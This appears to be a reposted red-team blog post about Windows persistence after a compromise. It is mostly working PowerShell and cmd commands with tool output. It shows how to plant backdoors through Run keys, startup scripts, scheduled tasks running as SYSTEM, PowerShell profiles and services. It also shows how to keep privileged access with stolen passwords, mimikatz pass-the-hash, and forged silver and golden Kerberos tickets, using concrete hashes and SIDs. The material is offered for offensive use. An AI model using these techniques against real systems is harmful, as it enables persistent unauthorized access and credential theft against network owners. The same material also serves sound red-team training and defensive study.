Persistence, noun, the continued or prolonged existence of something.
This is not something that usually gets much attention, despite it being a vital aspect of an attack lifecycle. When reading up on subjects like the “Cyber Kill Chain”, we frequently see 7 main steps:
- Recon
- Weaponisation
- Delivery
- Exploitation
- Installation
- Command & Control
- Actions on Objectives
In this post, I want to run through some basic persistence strategies and techniques.
C2 vs Privilege
The installation step can be described as “the installation of a backdoor on the compromised system, allowing an adversary to maintain persistence in the target environment”. The obvious translation is “to regain command & control over the system (should it be lost), without having to repeat steps 1 through 4.” For example, if we phish a user and establish C2 on their workstation, we need to ensure we can regain control should they reboot, or we kill our shell because we’re noobs, without having to phish them again.
However, “maintaining persistence” is much more than just regaining C2 over a single (or even multiple) system(s) - it’s about maintaining levels of privilege and access across an envronment.
If you have to repeat steps 1-4 to get back to a previous point, you are not being persistent.
C2
Userland vs Elevated
Typically, persistence mechanisms that trigger a C2 channel exist in one of the following levels:
- Medium Mandatory Level in the context of a standard user.
- High Mandatory Level in the context of SYSTEM.
Userland Techniques
HKCU
Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows. (Other keys are available).
Value name: Backdoor
Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
Start-Up
Create a batch script in the user startup folder.
PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat
start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
Scheduled Tasks
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
There are multiple trigger options to explore.
PowerShell Profiles
If your user is a heavy PowerShell user, backdoor their PowerShell profile.
PS C:\> Test-Path $profile
False
PS C:\> New-Item -Path $profile -Type File –Force
Directory: C:\Users\Rasta\Documents\WindowsPowerShell
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 22/03/2018 12:42 0 Microsoft.PowerShell_profile.ps1
PS C:\> $string = 'Start-Process "cmd.exe"'
PS C:\> $string | Out-File -FilePath "C:\Users\Rasta\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append
Elevated Techniques
HKLM
Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows.
Value name: Backdoor
Value data: C:\Windows\Temp\backdoor.exe
Services
Create a service that will start automatically or on-demand.
PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."
Scheduled Tasks
Scheduled Task to run as SYSTEM, everyday at 9am.
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am
PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
Maintaining Privilege
Passwords
Steal clear text passwords and use them with runas or other session spawning functionality.
C:\Users\rasta>dir \\fs01\c$
Access is denied.
C:\Users\rasta>runas /netonly /user:FS01\Administrator cmd
Enter the password for FS01\Administrator:
Attempting to start cmd as user "FS01\Administrator" ...
C:\Windows\system32>dir \\fs01\c$
Volume in drive \\fs01\c$ has no label.
Volume Serial Number is 069A-2329
Directory of \\fs01\c$
16/07/2016 13:23 <DIR> PerfLogs
14/10/2017 10:26 <DIR> Program Files
16/07/2016 13:23 <DIR> Program Files (x86)
22/03/2018 14:57 <DIR> Users
22/03/2018 14:57 <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 41,994,084,352 bytes free
NTLM hashes
If you can’t get passwords, use NTLM hashes with techniques such as Pass-the-Hash or psexec. Both domain accounts and local accounts can work.
C:\Users\rasta>dir \\fs01\c$
Access is denied.
mimikatz # sekurlsa::pth /user:Administrator /domain:FS01 /rc4:fc525c9683e8fe067095ba2ddc971889 /ptt
user : Administrator
domain : FS01
program : cmd.exe
impers. : no
NTLM : fc525c9683e8fe067095ba2ddc971889
| PID 3876
| TID 2952
| LSA Process is now R/W
| LUID 0 ; 691999 (00000000:000a8f1f)
\_ msv1_0 - data copy @ 00000214BC31C610 : OK !
\_ kerberos - data copy @ 00000214BC5529B8
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace -> null
C:\Windows\system32>dir \\fs01\c$
Volume in drive \\fs01\c$ has no label.
Volume Serial Number is 069A-2329
Directory of \\fs01\c$
16/07/2016 13:23 <DIR> PerfLogs
14/10/2017 10:26 <DIR> Program Files
16/07/2016 13:23 <DIR> Program Files (x86)
22/03/2018 14:57 <DIR> Users
22/03/2018 14:57 <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 41,993,674,752 bytes free
Local Groups
Adding new local users can provide a method of getting back into machines. If placing them in the Administrators group is too obvious, use other privileged groups such as Remote Desktop Users, Remote Management Users or Backup Operators.
Domain Groups
Often times, domain groups are created to administer groups of machines by granting local admin privilege over them. Adding your own domain account to these groups can provide you persistent access to multiple machines at once.
Silver Tickets
With the NTLM hash of a computer account, silver tickets can be used to regain local admin privileges via the CIFS service.
* Username : FS01$
* Domain : LAB
* NTLM : 47b1d9d581f29b3b43845692bd4a0322
C:\Users\rasta>dir \\fs01\c$
Access is denied.
mimikatz # kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /target:fs01 /rc4:47b1d9d581f29b3b43845692bd4a0322 /service:cifs /ptt
User : Administrator
Domain : testlab.local (TESTLAB)
SID : S-1-5-21-1516486103-3973840447-1748718438
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 47b1d9d581f29b3b43845692bd4a0322 - rc4_hmac_nt
Service : cifs
Target : fs01
Lifetime : 22/03/2018 15:25:33 ; 19/03/2028 15:25:33 ; 19/03/2028 15:25:33
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ testlab.local' successfully submitted for current session
C:\Users\rasta>dir \\fs01\c$
Volume in drive \\fs01\c$ has no label.
Volume Serial Number is 069A-2329
Directory of \\fs01\c$
16/07/2016 13:23 <DIR> PerfLogs
14/10/2017 10:26 <DIR> Program Files
16/07/2016 13:23 <DIR> Program Files (x86)
22/03/2018 14:57 <DIR> Users
22/03/2018 14:57 <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 41,994,330,112 bytes free
Golden Tickets
Golden tickets can be used to forge access to any service in the domain.
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 22/03/2018 14:49:02
Object Security ID : S-1-5-21-1516486103-3973840447-1748718438-502
Object Relative ID : 502
Credentials:
Hash NTLM: 9063b8edb3d04ed734edd49e5b0adef3
ntlm- 0: 9063b8edb3d04ed734edd49e5b0adef3
lm - 0: be97fc24cf1ad2cc2d193430d113f45c
C:\Users\rasta>dir \\dc01\c$
Access is denied.
mimikatz # kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /rc4:9063b8edb3d04ed734edd49e5b0adef3 /ptt
User : Administrator
Domain : testlab.local (TESTLAB)
SID : S-1-5-21-1516486103-3973840447-1748718438
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 9063b8edb3d04ed734edd49e5b0adef3 - rc4_hmac_nt
Lifetime : 22/03/2018 15:36:25 ; 19/03/2028 15:36:25 ; 19/03/2028 15:36:25
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ testlab.local' successfully submitted for current session
C:\Users\rasta>dir \\dc01\c$
Volume in drive \\dc01\c$ has no label.
Volume Serial Number is 069A-2329
Directory of \\dc01\c$
16/07/2016 13:23 <DIR> PerfLogs
14/10/2017 10:26 <DIR> Program Files
16/07/2016 13:23 <DIR> Program Files (x86)
22/03/2018 14:42 <DIR> Users
22/03/2018 14:48 <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 41,120,235,520 bytes free
Be Strategic
You should always have an idea of what your persistence strategy will be. Take the time to understand the limitations and advantages of each technique. Experiment with different payloads such as PowerShell, PE’s, DLLs and scriptlets. Learn about staged and stageless payloads and where they work best. Consider the use of different transports like HTTP/S, SMB and DNS.
如有侵权请联系:admin#unsafe.sh